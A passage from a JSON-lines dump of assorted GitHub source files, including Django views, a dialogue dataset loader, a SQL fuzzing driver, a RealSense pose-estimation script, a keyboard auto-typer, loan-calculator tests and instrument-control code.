name='shop'),\n # path('signup', views.signup, name='signup'),\n path('add_to_cart/', views.add_to_cart, name='add_to_cart'),\n path('remove_from_cart/', views.remove_from_cart, name='remove_from_cart'),\n path('store_cart', views.store_cart, name='store_cart'),\n path('checkout/', views.checkout, name='checkout'),\n path('checkout_ok/', views.checkout, name='order_success'),\n]\n","repo_name":"travoroguna/Africrafts","sub_path":"shop/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":506,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"20020935980","text":"\"\"\"@package views\nThis module provides a view to create an association.\n\"\"\"\nfrom django.http import HttpResponse, HttpResponseRedirect\nfrom django.shortcuts import render, redirect\nfrom core.models import Association\nfrom django.urls import reverse\nfrom django.contrib.auth.decorators import login_required\n\nfrom core.forms.association_create import association_form\n\n\n##\n# @brief Render and process a form to create an association.\n# @param request HTTP request.\n# @return Rendered web page.\n@login_required\ndef view(request):\n if request.method == 'POST':\n form = association_form(request.POST, request.FILES)\n if form.is_valid():\n asso = Association.objects.all().filter(\n name=form.cleaned_data['name'])\n if asso:\n form = association_form()\n return render(request, 'association_create.html', {\n 'form': form,\n 'fail': 'Cette association a déjà été créée'\n })\n\n association = Association()\n association.name = form.cleaned_data['name']\n association.website = form.cleaned_data['website']\n association.email = form.cleaned_data['email']\n association.logo = form.cleaned_data['logo']\n association.save()\n return render(request, 'association_create.html', {\n 'form': form,\n 'info': 'Votre association a bien été créée'\n })\n else:\n form = association_form()\n\n return render(request, 'association_create.html', {'form': form})\n","repo_name":"flomonster/ticket","sub_path":"core/views/association_create.py","file_name":"association_create.py","file_ext":"py","file_size_in_byte":1603,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"11306412075","text":"'''\nThe dataset of causal language modelling.\nBatch same sizes together such that we use minimal padding.\n'''\n\n\nimport datasets\nimport torch\n\nfrom torch.utils.data import Dataset, DataLoader\nimport itertools\nimport numpy as np\nfrom transformers import RobertaTokenizerFast\n\nflatten = itertools.chain.from_iterable\n\n\nclass CLMDataset(Dataset):\n\n def __init__(self, tokenizer, size=None, transform=None, split=\"train\", batch_size=16):\n self.original_dataset = datasets.load_dataset(\"daily_dialog\", split=split, )\n self.tokenizer = tokenizer\n # Next we process the dataset to split it up properly.\n self.size = size\n self.batch_size = batch_size\n self.dataset = self.process_dataset()\n\n def process_dataset(self):\n '''\n Batch same sizes together. To get minimal overhead when applying padding.\n '''\n sorted_results = self.get_sorted_samples()\n\n #### Naive way: pick\n final_samples = []\n\n current_sample_len = 0\n current_batch = []\n for r in sorted_results:\n\n if len(current_batch) == 0:\n current_batch.append(r)\n # Keep adding until the batch is full\n elif len(current_batch) >= self.batch_size:\n final_samples.append(current_batch)\n current_batch = [r]\n # We simply add to the batch\n else:\n current_batch.append(r)\n\n if self.size:\n final_samples = final_samples[:self.size]\n\n ### Lastly we must make sure the padding is there. Hence we decode and than batch encode to automatically pad the samples.\n result = []\n for final_sample in final_samples:\n temp = [' '.join(s) for s in final_sample]\n if type(self.tokenizer) != RobertaTokenizerFast:\n\n result.append(torch.stack([enc.ids for enc in self.tokenizer.encode_batch(temp)]))\n else:\n result.append(torch.tensor(self.tokenizer(temp, padding=True, add_special_tokens=False).input_ids))\n return result\n\n def get_sorted_samples(self):\n '''\n Sorts the samples in lists of approximatly the same size.\n '''\n dialogues = ['[START] ' + '[SEP]'.join(dialogue[\"dialog\"]) for dialogue in self.original_dataset]\n\n if type(self.tokenizer) != RobertaTokenizerFast:\n dialogues = ['[START] ' + '[SEP]'.join(dialogue[\"dialog\"]) for dialogue in self.original_dataset]\n\n tokenized_dataset = [self.tokenizer.encode(sample).tokens for sample in dialogues]\n else:\n dialogues = ['[START] ' + ''.join(dialogue[\"dialog\"]) for dialogue in self.original_dataset]\n\n tokenized_dataset = [self.tokenizer.tokenize(sample) for sample in dialogues]\n sorted_results = sorted(tokenized_dataset, key=lambda x: len(x))\n\n # Next we create lists of utterances that are approximatly the same size. We shuffle the utterances within such a list.\n # This has a result that when we batch them we end up with batches that have utterances of approximatly the same length.\n results = []\n current = []\n current_len = len(sorted_results[0])\n for r in sorted_results:\n if abs(current_len - len(r)) <= 15:\n current.append(r)\n else:\n # shuffle the set itself.\n np.random.shuffle(current)\n results += current\n current = [r]\n current_len = len(r)\n return results\n\n def reshuffle_dataset(self):\n '''\n Reshuffles the dataset\n '''\n self.dataset = self.process_dataset()\n\n def __len__(self):\n return len(self.dataset)\n\n def __getitem__(self, idx):\n return self.dataset[idx]\n","repo_name":"gersonfoks/rational-dialog-model","sub_path":"misc/old/CLMDataset.py","file_name":"CLMDataset.py","file_ext":"py","file_size_in_byte":3810,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"2513786446","text":"# submission: https://leetcode.com/submissions/detail/282036526/\n\nclass Solution:\n def climbStairs(self, n: int) -> int:\n memo = [0]*n\n return self.fibo_dp(0,n,memo)\n\n def fibo_dp(self,i, n, memo):\n if i>n:\n return 0\n if i == n: \n return 1\n if memo[i] > 0:\n return memo[i]\n memo[i] = self.fibo_dp(i+1,n,memo) + self.fibo_dp(i+2,n,memo)\n return memo[i]\n","repo_name":"toad0475/Algorithm_Greenhorns","sub_path":"toad0475/Climbing_Stairs.py","file_name":"Climbing_Stairs.py","file_ext":"py","file_size_in_byte":440,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"18"} +{"seq_id":"70736579560","text":"import numpy as np\nfrom System_Objects import *\nimport pandas as pd\nfrom Menu import ViewFileName\n\n# ---------------------------------------------------------------------------------------#\n# This script reads the system data from an Excel-file, and builds the objects for the system.\n# ---------------------------------------------------------------------------------------#\n\n\ndef System_Setup():\n \"\"\"Function to build the system as described in the Excel-file. Returns a list of buses and lines.\"\"\"\n\n # Read data from excel file\n file = ViewFileName(filext=\"xlsx\")\n xls = pd.ExcelFile(file)\n bval = pd.read_excel(xls, 'Bus')\n bval = bval.values\n lval = pd.read_excel(xls, 'Branch')\n lval = lval.values\n\n # Crate lists for buses and branches\n Buses = []\n Lines = []\n\n # Fill in information from the Excel-file\n for row in bval:\n bus = Bus(row)\n Buses.append(bus)\n\n for row in lval:\n line = Line(row)\n Lines.append(line)\n\n return Buses, Lines\n","repo_name":"alvaroyasater/ELK14","sub_path":"Assignments/System_Setup.py","file_name":"System_Setup.py","file_ext":"py","file_size_in_byte":1016,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"35806423665","text":"\"\"\"Pls do `pip install -r requirements.txt` in terminal\"\"\"\nimport keyboard\nimport simpleaudio as sa\nimport threading\nimport time\nimport os\n\ndelay = 0.01\nstartKey = 'home'\nexitKey = 'escape'\nfilePath = 'Copy.py'\ntypingSoundFilePath = 'Sounds/Typing.wav'\nendSoundFilePath = 'Sounds/kill.wav'\nrequireEndSound = False\nrequireExit = False\nrequireTimer = True\nloop = True\n\nstart = False\nend = False\nfile = open(filePath, 'r', encoding='utf8')\nlines = file.readlines()\ncounter = 0\ntimer = 0\ntimeCount = True\n\ndef IsActive(name):\n if name not in [thread.name for thread in threading.enumerate()]:\n return False\n return True\n\ndef Exit():\n global start\n global end\n while True:\n if keyboard.is_pressed(exitKey):\n start = False\n end = True\n break\n\ndef Playsound(path):\n wave_object = sa.WaveObject.from_wave_file(path)\n play_object = wave_object.play()\n play_object.wait_done()\n\ndef Typing():\n global start\n while start:\n if requireTimer:\n threading.Thread(target=Timer, daemon=True).start()\n for line in lines:\n for char in line:\n if not start:\n return\n if not IsActive('typing'):\n threading.Thread(target=Playsound, args=[typingSoundFilePath,], daemon=True, name='typing').start()\n keyboard.write(char)\n time.sleep(delay)\n start = False\n\ndef StartTyping():\n global start\n global counter\n global timer\n global timeCount\n pressed = False\n while not start and not end:\n if keyboard.is_pressed(startKey):\n pressed = True\n if pressed and not keyboard.is_pressed(startKey):\n start = True\n Typing()\n if requireEndSound:\n sa.stop_all()\n Playsound(endSoundFilePath)\n sa.stop_all()\n if not end:\n counter += 1\n message = f'Total Task completed: {counter} time'\n if counter > 1:\n message += 's'\n print(f'{message}!')\n if requireTimer:\n message = f'Task completed in {timer} sec'\n if timer > 1:\n message += 's'\n print(f'{message}!')\n timeCount = False\n\ndef Timer():\n global timer\n global timeCount\n timer = 0\n timeCount = True\n while timeCount:\n time.sleep(1)\n timer += 1\n\ndef main():\n os.system('clear||cls')\n message = f'Click `{startKey}` key to start auto type.'\n if requireExit:\n message = ''.join(list(message)[:-1])\n message += f', click `{exitKey}` to stop auto type.'\n print(message)\n if requireExit:\n threading.Thread(target=Exit, daemon=True).start()\n StartTyping()\n while loop:\n if end:\n break\n StartTyping()\n\nif __name__ == \"__main__\":\n main()\n print('Task ended!')\n\n\"\"\"\n*** If you want to use the auto typer in VS Code, pls copy the texts below to settings.json***\n \"editor.autoIndent\": \"none\",\n \"editor.autoClosingBrackets\": \"never\",\n \"editor.acceptSuggestionOnEnter\": \"off\"\n\"\"\"","repo_name":"BenjaminThio/auto-typer","sub_path":"AutoTyper.py","file_name":"AutoTyper.py","file_ext":"py","file_size_in_byte":3085,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"73309726439","text":"import subprocess\nimport sys\nfrom cd import cd\nimport call\n\ndef exit(code):\n\tsys.exit(code)\n\ndef appendToFile(directory, fileName, content):\n\tif not(content.isspace()) and content: #not empty or spaces\n\t\twith cd(directory):\n\t\t\twith open(fileName, \"a\") as f:\n\t\t\t\tf.write('\\n' + content.strip() + '\\n\\n')\n\ndef errorDump(message, output):\n\tif not(output.isspace()) and output:\n\t\tcombinedOutput = message + '\\n-----\\n' + output.strip()\n\t\tappendToFile(\"errors\", seed, combinedOutput)\n\ntry:\n\tseed = sys.argv[1]\nexcept IndexError:\n\tseed = \"0\"\n\n#generate a basic query\nout = call.cmd([\"python gen-query.py \" + seed])\nerrorDump(\"error in query generation\", out[1])\nappendToFile(\"queries\", seed, out[0])\ncall.cmd([r\"sed -i 's/(/\\n(\\n/g;s/)/\\n)\\n/g' queries/\" + seed])\n\n#fuzz query\nwith cd(\"/home/calli/project/antlr4/\"):\n\tqueryFile = \"~/project/scripts/queries/\" + seed\n\tout = call.cmd([\"java fuzzer.Main \" + seed + \" \" + queryFile])\nerrorDump(\"error in query fuzzing\", out[1])\nappendToFile(\"fuzzed\", seed, out[0])\n\n#run mysql\nout = call.cmd([\"mysql -h 127.0.0.1 -P 19300 -u root -D test -N -B < fuzzed/\" + seed])\nerrorDump(\"error in mysql\", out[1])\nappendToFile(\"mysql_logs\", seed, out[0])\ncall.cmd([\"sort mysql_logs/\" + seed + \" -o mysql_logs/\" + seed])\ncall.cmd([\"sed -i -- 's/NULL/ /g' mysql_logs/\" + seed])\n\n#run sqlite\nout = call.cmd([\"sqlite3 db.sqlite -column < fuzzed/\" + seed])\nerrorDump(\"error in sqlite\", out[1])\nappendToFile(\"sqlite_logs\", seed, out[0])\ncall.cmd([\"sort sqlite_logs/\" + seed + \" -o sqlite_logs/\" + seed])\n\n#find diff\nout = call.cmd([\"cmp mysql_logs/\" + seed + \" sqlite_logs/\" + seed])\nerrorDump(\"error in diff\", out[1])\nappendToFile(\"diff\", seed, out[0])\n","repo_name":"calvin-li/antlr4-mysql","sub_path":"scripts/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1677,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"72907809639","text":"import os\nimport matplotlib.pyplot as plt\nfrom parallelrun import ParallelProcessor as P\nimport numpy as np\n\n\nclass c12(object):\n def __init__(self):\n path = '/home/kaho/kepshot_carbon/'\n _allp = os.listdir(path)\n qb = []\n mdot = []\n c12 = []\n for i in _allp:\n p = P.load(path+i)\n qb.extend(p.Qb)\n mdot.extend(p.mdot)\n c12.extend(p.abub[6,12])\n plt.scatter(mdot, qb, s=np.ones(len(c12))*30, c=c12)\n cb = plt.colorbar()\n cb.set_label(label='Carbon mass fraction', fontsize = 15)\n plt.ylabel('Base luminosity / $\\dot{m}$ (MeV/u)', fontsize=15)\n plt.xlabel('$\\dot{M}_{\\mathrm{Edd}}$', fontsize=15)\n plt.ylim(0.5, 0.7)\n plt.xlim(0.07, 0.105)\n plt.tick_params(labelsize=13)\n cb.update_ticks(labelsize=13)\n plt.show()\n\t","repo_name":"kahoTT/krepo1","sub_path":"scatter_abu.py","file_name":"scatter_abu.py","file_ext":"py","file_size_in_byte":872,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"29907089406","text":"\"\"\"\nGiven an array of integers sorted in ascending order, find the starting and ending position of a given target value.\n\nYour algorithm's runtime complexity must be in the order of O(log n).\n\nIf the target is not found in the array, return [-1, -1].\n\nFor example,\nGiven [5, 7, 7, 8, 8, 10] and target value 8,\nreturn [3, 4].\n\"\"\"\nclass Solution:\n def searchIndex(self, nums, target):\n \"\"\"\n :type nums: List[int]\n :type target: int\n :rtype: List[int]\n \"\"\"\n if (not nums) or nums[0]>=target:\n return -1\n if nums[-1]= target:\n right = mid-1\n\n if nums[left]>=target:\n return left-1\n else:\n return left\n\nif __name__ == '__main__':\n s = Solution()\n nums = [3,5, 6,6,7, 7,7,7,8, 8, 9,9,9,10]\n nums = [3]\n # nums = [1]\n # nums = []\n print(s.searchIndex(nums,4))\n\n print(list(enumerate(nums)))\n\n \n print('z'<'b')\n\n\n\n","repo_name":"Mang0o/leetcode","sub_path":"binary search/search biggest element smaller than k.py","file_name":"search biggest element smaller than k.py","file_ext":"py","file_size_in_byte":1159,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"39406738321","text":"import pyrealsense2 as rs\n# Import Numpy for easy array manipulation\nimport numpy as np\n# Import OpenCV for easy image rendering\nimport cv2\n\nimport tensorflow as tf\nfrom tensorflow.keras.applications.resnet50 import preprocess_input\nimport keras\nfrom keras import layers, models\nimport os\nfrom pathlib import Path\nfrom keras.models import model_from_json\nimport time\n\n\n\n#from sklearn.model_selection import train_test_split\nos.environ['KMP_DUPLICATE_LIB_OK']='True'\nos.environ['MKL_NUM_THREADS'] = '16'\nos.environ['GOTO_NUM_THREADS'] = '16'\nos.environ['OMP_NUM_THREADS'] = '16'\nos.environ['openmp'] = 'True'\n\n# Get RGB Patches\ndef get_Patches_data(rgbImg,zDepth):\n \n \n \n # Extract SURF KP\n surf_HS = 1500\n surf = cv2.xfeatures2d.SURF_create(surf_HS)\n kp,des = surf.detectAndCompute(rgbImg,None)\n #print('Number of Keypoints detected :',len(kp))\n nb_KP = len(kp)\n nb_good_patch = nb_KP\n\n\n #kp_nz_D = []\n Patches_RGB = []\n Patches_2D = []\n patch_size = 25\n\n for i in range(len(kp)):\n #Patch RGB\n kp_rgb = np.array(rgbImg[int(kp[i].pt[1])-patch_size:int(kp[i].pt[1])+patch_size,\n int(kp[i].pt[0])-patch_size:int(kp[i].pt[0])+patch_size])\n #Patch 2D homogeneaous\n kp_homg_2D = np.array(kp[i].pt).tolist()\n kp_homg_2D.append(1)\n kp_homg_2D = np.asarray(kp_homg_2D).reshape(-1,1)\n\n #Patch Depth\n kp_Di = zDepth[int(kp[i].pt[1]),int(kp[i].pt[0])]\n # Remove patches without good shape (50,50,3) and with Depth = 0\n if (kp_Di!=0 and kp_rgb.shape == (patch_size*2,patch_size*2,3)):\n nb_good_patch = nb_good_patch - 1\n Patches_2D.append(kp_homg_2D)\n Patches_RGB.append(kp_rgb)\n #kp_nz_D.append(kp[i])\n nb_ptch = nb_KP-nb_good_patch\n print('Number of Good Patches : ', nb_ptch)\n \n return Patches_RGB,Patches_2D,nb_ptch\n\ndef draw_box(frame,imgPoints,color):\n frame = cv2.line(frame,(imgPoints[0].tolist()),(imgPoints[1].tolist()),color,3)\n frame = cv2.line(frame,(imgPoints[0].tolist()),(imgPoints[4].tolist()),color,3)\n frame = cv2.line(frame,(imgPoints[0].tolist()),(imgPoints[3].tolist()),color,3)\n frame = cv2.line(frame,(imgPoints[4].tolist()),(imgPoints[5].tolist()),color,3)\n frame = cv2.line(frame,(imgPoints[4].tolist()),(imgPoints[7].tolist()),color,3)\n frame = cv2.line(frame,(imgPoints[5].tolist()),(imgPoints[1].tolist()),color,3)\n frame = cv2.line(frame,(imgPoints[5].tolist()),(imgPoints[6].tolist()),color,3)\n frame = cv2.line(frame,(imgPoints[2].tolist()),(imgPoints[3].tolist()),color,3)\n frame = cv2.line(frame,(imgPoints[2].tolist()),(imgPoints[1].tolist()),color,3)\n frame = cv2.line(frame,(imgPoints[6].tolist()),(imgPoints[2].tolist()),color,3)\n frame = cv2.line(frame,(imgPoints[6].tolist()),(imgPoints[7].tolist()),color,3)\n frame = cv2.line(frame,(imgPoints[7].tolist()),(imgPoints[3].tolist()),color,3)\n return frame\n\npath_model = \"Evaluation_Data_Test/box_train\"\n# Load CNN regression model\nf = Path(f'{path_model}/_3dNet_Save_3/_3dNet__structure.json')\n_3dNet_structure = f.read_text()\n# Recréer l'objet du model Keras à partir des données json\n_3dNet_ = model_from_json(_3dNet_structure)\n# Recharger les poids entraînés du model\n_3dNet_.load_weights(f\"{path_model}/_3dNet_Save_3/_3dNet__weights.h5\")\n#load history \n_3dNet_history = np.load(f'{path_model}/_3dNet_Save_3/_3DNet_History.npy',allow_pickle=True).flatten()[0]\n\n\n#img_indexes = np.loadtxt('./pyrealsense2/img_indices.txt')\n# Create a pipeline\npipeline = rs.pipeline()\n\n# Create a config and configure the pipeline to stream\n# different resolutions of color and depth streams\nconfig = rs.config()\n\n# Get device product line for setting a supporting resolution\npipeline_wrapper = rs.pipeline_wrapper(pipeline)\npipeline_profile = config.resolve(pipeline_wrapper)\ndevice = pipeline_profile.get_device()\ndevice_product_line = str(device.get_info(rs.camera_info.product_line))\n\nfound_rgb = False\nfor s in device.sensors:\n if s.get_info(rs.camera_info.name) == 'RGB Camera':\n found_rgb = True\n break\nif not found_rgb:\n print(\"The demo requires Depth camera with Color sensor\")\n exit(0)\n\nconfig.enable_stream(rs.stream.depth, 640, 480, rs.format.z16, 30)\n#config.enable_stream(rs.stream.pose)\n\nif device_product_line == 'L500':\n config.enable_stream(rs.stream.color, 960, 540, rs.format.bgr8, 30)\nelse:\n config.enable_stream(rs.stream.color, 640, 480, rs.format.bgr8, 30)\n\n# Start streaming\nprofile = pipeline.start(config)\n\n# Getting the depth sensor's depth scale (see rs-align example for explanation)\ndepth_sensor = profile.get_device().first_depth_sensor()\ndepth_scale = depth_sensor.get_depth_scale()\nprint(\"Depth Scale is: \" , depth_scale)\n\n\n\n\n# We will be removing the background of objects more than\n# clipping_distance_in_meters meters away\nclipping_distance_in_meters = 1 #1 meter\nclipping_distance = clipping_distance_in_meters / depth_scale\n\n# Create an align object\n# rs.align allows us to perform alignment of depth frames to others frames\n# The \"align_to\" is the stream type to which we plan to align depth frames.\nalign_to = rs.stream.color\nalign = rs.align(align_to)\n\n# Streaming loop\nnb_frames = 1500\ntry:\n i=0\n while nb_frames>0:\n # Get frameset of color and depth\n frames = pipeline.wait_for_frames()\n # frames.get_depth_frame() is a 640x360 depth image\n\n # Align the depth frame to color frame\n aligned_frames = align.process(frames)\n\n # Get aligned frames\n aligned_depth_frame = aligned_frames.get_depth_frame() # aligned_depth_frame is a 640x480 depth image\n color_frame = aligned_frames.get_color_frame()\n\n #color_intrinsics = color_frame.profile.as_video_stream_profile().intrinsics\n #print(\"color_intrinsics = \" ,color_intrinsics)\n\n #depth_intrinsics = aligned_depth_frame.profile.as_video_stream_profile().intrinsics\n #print(\"depth_intrinsics = \" ,depth_intrinsics)\n\n\n color_image = np.asanyarray(color_frame.get_data())\n depth_image = np.asanyarray(aligned_depth_frame.get_data())\n depth_m = depth_image.astype(float) * depth_scale\n ###### Patch 2D_3D Extraction ########\n _RGB_Patches,_2D_Patches,NB_Patches = get_Patches_data(cv2.cvtColor(color_image,cv2.COLOR_BGR2RGB),depth_m)\n _RGB_Patches = np.asarray(_RGB_Patches)\n _2D_Patches = np.asarray(_2D_Patches)[:,:2,:].reshape(-1,2)\n\n ###### 3DNet Prediction ########## \n frame_i_norm_Patches = preprocess_input(_RGB_Patches)\n frame_i_GT_2D = _2D_Patches\n frame_i_Pred_3D = _3dNet_.predict(frame_i_norm_Patches)\n frame_i = np.copy(color_image)\n \n\n ####### PnPRansac Pose Estimation ######### \n K = np.asarray([[606.209,0,320.046],\n [0,606.719,238.926],\n [0,0,1]],np.float32)\n retval, rvec, tvec, inliers= cv2.solvePnPRansac(frame_i_Pred_3D,\n frame_i_GT_2D,\n K,\n np.array([]),\n #reprojectionError=7,\n #iterationsCount= 1000\n )\n\n ######### Levenberg-Marquardt Pose Refinement #######\n criteria = (cv2.TERM_CRITERIA_EPS + cv2.TERM_CRITERIA_COUNT + cv2.TERM_CRITERIA_MAX_ITER,20,1)\n for l in range(500):\n rvecLM,tvecLM= cv2.solvePnPRefineLM(frame_i_Pred_3D,\n frame_i_GT_2D,\n K,\n np.array([]),\n rvec, \n tvec,\n criteria=criteria\n )\n\n ######## Box AR Reconstruction #######\n objPoints = np.array([[0,90,0],\n [125,90,0],\n [125,90,70],\n [0,90,70],\n [0,0,0],\n [125,0,0],\n [125,0,70],\n [0,0,70]],np.float64).reshape((-1,1,3)) * 1e-3\n projected_box_LMPose = cv2.projectPoints(objPoints,rvecLM,tvecLM,K,np.array([]))[0]\n \n\n for _2d_LM in projected_box_LMPose:\n a1,b1 = _2d_LM.ravel()\n frame_i = cv2.circle(frame_i,(int(a1),int(b1)),9,[255,0,0],-1)\n\n frame_i = draw_box(frame_i,np.asarray(projected_box_LMPose,np.int32).reshape(-1,2),(255,0,0))\n \n # Validate that both frames are valid\n if not aligned_depth_frame or not color_frame:\n continue\n \n # Render images:\n # depth align to color on left\n # depth on right\n depth_colormap = cv2.applyColorMap(cv2.convertScaleAbs(depth_image, alpha=0.03), cv2.COLORMAP_JET)\n images = np.hstack((frame_i, depth_colormap))\n #cv2.imwrite(f\"./pyrealsense2/data15/frame-{i:06}-depth.png\", depth_colormap)\n #cv2.imwrite(f\"./pyrealsense2/data15/frame-{i:06}-rgb.png\", color_image)\n #np.savetxt(f'./pyrealsense2/data15/frame-{i:06}-zDepth.txt',depth_m)\n i=i+1\n nb_frames = nb_frames-1\n cv2.namedWindow('Align Example', cv2.WINDOW_NORMAL)\n cv2.imshow('Align Example', images)\n key = cv2.waitKey(1)\n # Press esc or 'q' to close the image window\n if key & 0xFF == ord('q') or key == 27:\n cv2.destroyAllWindows()\n break\nfinally:\n pipeline.stop()\n","repo_name":"moumed/Smart-3D-Camera-Pose-Estimation-for-Complex-Augmented-Reality-Environments-Using-Deep-Learning-Techn","sub_path":"[3_TOUIL][Annexe_1][3DNet-Code-main]/6-3DNetRealTime.py","file_name":"6-3DNetRealTime.py","file_ext":"py","file_size_in_byte":9815,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"25110797962","text":"import os\r\nimport csv\r\n\r\n\r\ndef printlist(mylist):\r\n for x in mylist:\r\n print(x)\r\n\r\n\r\ndef sort_cost(mylist, sign, quantity):\r\n for x in mylist:\r\n if sign == '>':\r\n if int(x[\"Likes\"]) > quantity:\r\n print(x)\r\n elif sign == '<':\r\n if int(x[\"Likes\"]) < quantity:\r\n print(x)\r\n elif sign == '!=':\r\n if x[\"Likes\"] != quantity:\r\n print(x)\r\n elif sign == '>=':\r\n if int(x[\"Likes\"]) >= quantity:\r\n print(x)\r\n elif sign == '<=':\r\n if int(x[\"Likes\"]) <= quantity:\r\n print(x)\r\n elif sign == '==':\r\n if x[\"Likes\"] == quantity:\r\n print(x)\r\n\r\n\r\ndef sort_name(mylist):\r\n print(\"Сортировка по названию(по убыванию):\")\r\n mylist.sort(key=lambda x: x['Name'])\r\n printlist(mylist)\r\n\r\n\r\ndef sort_like(mylist):\r\n print(\"Сортировка по стоимости(по убыванию):\")\r\n mylist.sort(key=lambda x: int(x['Likes']))\r\n new_list = list(reversed(mylist))\r\n printlist(new_list)\r\n\r\n\r\nif __name__ == '__main__':\r\n print(\"Количество файлов в директории:\", len(os.listdir(path=\".\")))\r\n mylist = {}\r\n with open(\"data.csv\", newline='') as file:\r\n reader = csv.DictReader(file, delimiter=\";\")\r\n mylist = [row for row in reader]\r\n key = int(\r\n input(\"Введите \\n1 - если хотите увидеть сортировку файла по именам в алфавитном порядке, \\n2 - если хотите \"\r\n \"увидеть сортировку по лайкам по возрастанию, \\n3 - если хотите увидеть только строки с определённым \"\r\n \"количеством лайков, \\n4 - если просто хотите вывести все строки\\n\")\r\n )\r\n if key == 1:\r\n sort_name(mylist)\r\n elif key == 2:\r\n sort_like(mylist)\r\n elif key == 3:\r\n sign = input(\"Введите знак с сравнения. Вот список знаков: >, <, >=, <=, ==, !=\\n\")\r\n quantity = int(input(\"Введите количество с которым хотите сравнивать\\n\"))\r\n print(\"Вывод по условию(стоимость\", sign, \" \", quantity, \": \")\r\n sort_cost(mylist, sign, quantity)\r\n elif key == 4:\r\n printlist(mylist)\r\n\r\n print(\"Введите:\\n1 - Если хотите сохранить в файл\\n0 - Если не хотите сохранять в файл\")\r\n check = int(input())\r\n if check == 1:\r\n fields = [\"п»їNumber\", \"Name\", \"Text\", \"Likes\"]\r\n with open('output.csv', 'w', newline='') as file:\r\n writer = csv.DictWriter(file, fieldnames=fields)\r\n writer.writeheader()\r\n for row in mylist:\r\n writer.writerow(row)\r\n print(\"Сохранение завершено\")\r\n else:\r\n exit()\r\n","repo_name":"MMidaVV/Development-of-professional-applications","sub_path":"lab3/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3092,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"29881249340","text":"# test_friend.py\n\n# assert expression\n## if true nothing happens\n## if false raises AssertionError\n\n# create virtual environment and activate\n# pip install pytest\n# pip install pytest-cov\n\n# run tests with python -m pytest -s\n# compare -s and -v when running the tests\n# run coverage tests with python -m pytest --cov\n\nfrom datetime import date \nimport pytest\nfrom oop_loan_pmt import Loan, collectLoanDetails, main\n\n\n# Unit tests for Loan class\ndef test_discount_factor_calculation():\n #\n #GIVEN a user enters their loan details\n #WHEN the details are entered correctly\n #THEN the discount factor is calculated accurately\n #\n loan = Loan(100000, 30, 0.06)\n loan.calculateDiscountFactor()\n print(\"\\r\") # carriage return\n print(\" -- discount_factor_calculation unit test\")\n assert loan.getDiscountFactor() == pytest.approx(166.7916, rel=1e-2)\n\ndef test_loan_payment_calculation():\n #\n #GIVEN a user enters their loan details\n #WHEN a user enters their loan details correctly \n #THEN the loan payment is accurately calculated\n #\n loan = Loan(100000, 30, 0.06)\n loan.calculateLoanPmt()\n print(\"\\r\") # carriage return\n print(\" -- loan_payment_calculation unit test\")\n assert loan.getLoanPmt() == pytest.approx(599.55, rel=1e-2)\n\n# Functional tests for collectLoanDetails() function\ndef test_collect_loan_details_input(monkeypatch):\n #\n #GIVEN a user uses the loan app\n #WHEN a user enters their loan details correctly\n #THEN the app will correctly run\n #\n user_input = ['100000', '30', '0.06']\n monkeypatch.setattr('builtins.input', lambda x: user_input.pop(0))\n loan = collectLoanDetails()\n print(\"\\r\") # carriage return\n print(\" -- collect_loan_details functional test\")\n assert loan.loanAmount == 100000\n assert loan.numberOfPmts == 30 * 12\n assert loan.annualRate == 0.06\n\ndef test_collect_loan_details_invalid_input(monkeypatch):\n #\n #GIVEN a user uses the loan app\n #WHEN a user enters their loan details incorrectly\n #THEN a value error will occur\n #\n user_input = ['abc', '30', '0.06']\n monkeypatch.setattr('builtins.input', lambda x: user_input.pop(0))\n print(\"\\r\")\n print(\" -- invalid_loan_details functional test\")\n with pytest.raises(ValueError):\n collectLoanDetails()\n\n# Functional test for main() function\ndef test_main_output(capsys):\n #\n #GIVEN a user uses the loan app\n #WHEN the calculations are made\n #THEN the app prints an accurate statement\n #\n # Capture the stdout to check the output\n loan = Loan(100000, 30, 0.06) # Set up a Loan object with known values\n loan.calculateLoanPmt()\n \n print(\"\\r\")\n print(\" -- main functional tesr\")\n expected_output = \"Your monthly payment is: $599.55\"\n assert main() == expected_output","repo_name":"aholkefarnam/loan_testing","sub_path":"starter_test.py","file_name":"starter_test.py","file_ext":"py","file_size_in_byte":2817,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"24941013321","text":"import pyvisa\t\nimport ResourceManage\nimport numpy as np\n\n\n\nclass LSall():\n\tdef __init__(self,rm,idn_dict):\n\t\tself._hrange_dict = {'OFF':'0', '0':'OFF', '2.5mW':'1', '1':'2.5mW', '25mW':'2', '2':'25mW', '250mW':'3', '3':'250mW', '2.5W':'4', '4':'2.5W', '25W':'5', '5':'25W'}\n\t\tself.GPIBaddress = idn_dict['LSCI,MODEL340,340511,013102']\n\t\tself.device = rm.open_resource(self.GPIBaddress)\n\t\tself._ctrlloop = '1'\n\t\tself._channel = self.device.query('CSET? ' + self._ctrlloop).rstrip().split(',')[0]\n\t\tself.channel = self._channel #Initialing, to configure the control loop. E.g. change unit to K and switch it on\n\t\tself._sensortype = self.device.query('INTYPE? ' + self._channel).rstrip().split(',')[0]\n\t\tself._inputcurve = self.device.query('INCRV? ' + self._channel).rstrip()\n\t\tself._hrange = self._hrange_dict[self.device.query('RANGE?').rstrip()]\n\t\tself._rampmode = float(self.device.query('RAMP? ' + self._ctrlloop).rstrip().split(',')[0])\n\t\tself._ramprate = float(self.device.query('RAMP? ' + 